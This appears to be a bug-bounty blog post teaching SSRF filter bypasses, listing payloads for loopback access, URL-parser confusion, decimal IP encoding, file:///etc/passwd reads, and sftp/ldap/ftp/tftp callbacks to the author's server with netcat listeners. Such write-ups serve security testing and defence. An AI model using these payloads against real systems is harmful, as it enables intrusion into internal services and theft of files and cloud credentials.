In this post I have shared how I use bypassing logics to convert SSRFs into RCEs and some other critical information disclosures which pays some good bounties $$$ and also shared some tools and resources which is very helpful into your testing.Read and scroll there are lot of takeaways from this post.

SSRF (Server Side Request Forgery) is a vulnerability where attacker allows to make crafted requests in behalf of web application.The end goal is to craft the requests to get data from internal systems which is behind the firewalls,IDS etc and inaccessible outside the organisation.

Types of SSRF: 
  1. Basic : Where we get the response of the crafted request.
  2. Blind : where it doesn’t display the response but triggers the action.
Impact of the vulnerability
  • Scanning of internal network.
  • Read internally hosted files/data.
  • Access services listening on the loopback interface (127.0.0.1)
  • Read local system files.
  • If it’s hosted on AWS, access the AWS REST interface

Let’s understand how to learn bypassing in SSRF scenarios to chain the bugs into a very critical phase.

Vulnerabilities are everywhere but practice and crystal clear of basic knowledge helps you to build the logic of bypassing, understanding the basics how URL parser works in different environments etc.

Let’s  say we got a basic SSRF  in the parameter,  ?pageid=  

Target URL : http://target.url/home.php?pageid=

Attacker server : https://subhajitsaha.com

So to get reflected XSS we can simply fetch malicious JS file from external server .

http://target.url/home.php??pageid=https://subhajitsaha.com/jvv/evilsvgfile.svg

xss poc subhajitsaha.com

TBH I don’t like this because we might not escalate reflected XSS many times but sometimes we can do some really good escalations, it totally depends on your scenarios.

Bypassing : Finding the internal services

 http://target.url/home.php?pageid=http://localhost/anyinternalapps/admin.php

 It can lead to scan internal running services.But most of the times localhost is in the blacklist category so we need find some other ways to get into.My last bug of ssrf submission leads me to get into elastic search which is their internal service running without authentication.

pageid=http://127.0.0.1 

pageid=http://localhost  

For this other payloads can be use for bypassing:

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

http://spoofed.burpcollaborator.net  we can use this host it will point towards 127.0.0.1 / localhost. You can create your custom subdomain and add DNS A record and point the host to 127.0.0.1  just simple 😊

Also check nip.io it helps you to create custom domain mappings so you don’t need to edit etc/hosts file frequently. So whether you are doing Hack the box challenges  or black box approaches it helps alot.

Abusing the parsers: 

http://target.url/home.php?pageid=http://target.url#@subhajitsaha.com

http://target.url:80\@subhajitsaha.com:80/

http://target.url:80\@@subhajitsaha.com:80/

http://target.url:80:\@@subhajitsaha.com:80/

http://target.url:80#\@subhajitsaha.com:80/

Here, http://target.url thinks the request is being made by their own domain/IP so it looks like a legit request as there is no interference by the third domain / attacker domain.But as we are using @ our URL parser will parse ‘@’ and redirects the request to the attacker domain.This is how we can abuse the parsers.Different parsers parse the URL schemas differently.

I am attaching the research of Orange Tsai , which is incredible and he presented in many conferences.Here is the link to view.

Abusing the parser with IP conversion :

We can abuse the parser by conversion the each 8 bit of IP into decimals.

I use this tool https://www.browserling.com/tools/ip-to-dec to convert IP addresses into decimals.

For example : 

http://target.url/home.php?pageid=http://127.0.0.1    to    http://target.url/home.php?pageid=http://2130706433

IP conversions and encoding bypasses the blacklisted contents.

Sometimes double encoding also works for bypassing.

There are other few ways by using URL Schemes :

file://

http://target.url/home.php?pageid=file:///etc/passwd
http://target.url/home.php?pageid=file://\/\/etc/passwd

 

sftp : http://target.url/home.php?pageid=sftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337

ldap : http://target.url/home.php?pageid=ldap://subhajitsaha.com:1337 (ldaps , ldapi)

subhajitsaha.com:$ nc -lvp 1337

ftp : http://target.url/home.php?pageid=ftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337

tftp : http://target.url/home.php?pageid=tftp://subhajitsaha.com:1337

subhajitsaha.com:$ nc -lvp 1337
Bypassing : By using Unicode circles

http://target.url/home.php?pageid=http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ

Surprisingly, it works.The URL parser parse Unicode circles into plain text.

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Hope this will help you to understand how bypasses can be done.Keep all these payloads in your note or the best way to make a bash script to automate and generate payloads for you by taking 2 user inputs i.e. targeturl, attackerurl  hope i will put that in my github soon.Also if you are on cloud instance try fetching metadata.

A week ago me and @dorkerdevil were testing a SSRF parameter and we made to RCE (Remote Code Execution) which is priority 1 bug.

Hope I shared some worth reading  content.

Share with people it motivates me to write more posts.

Thanks for reading!

 

Also read : https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158

 

Copy link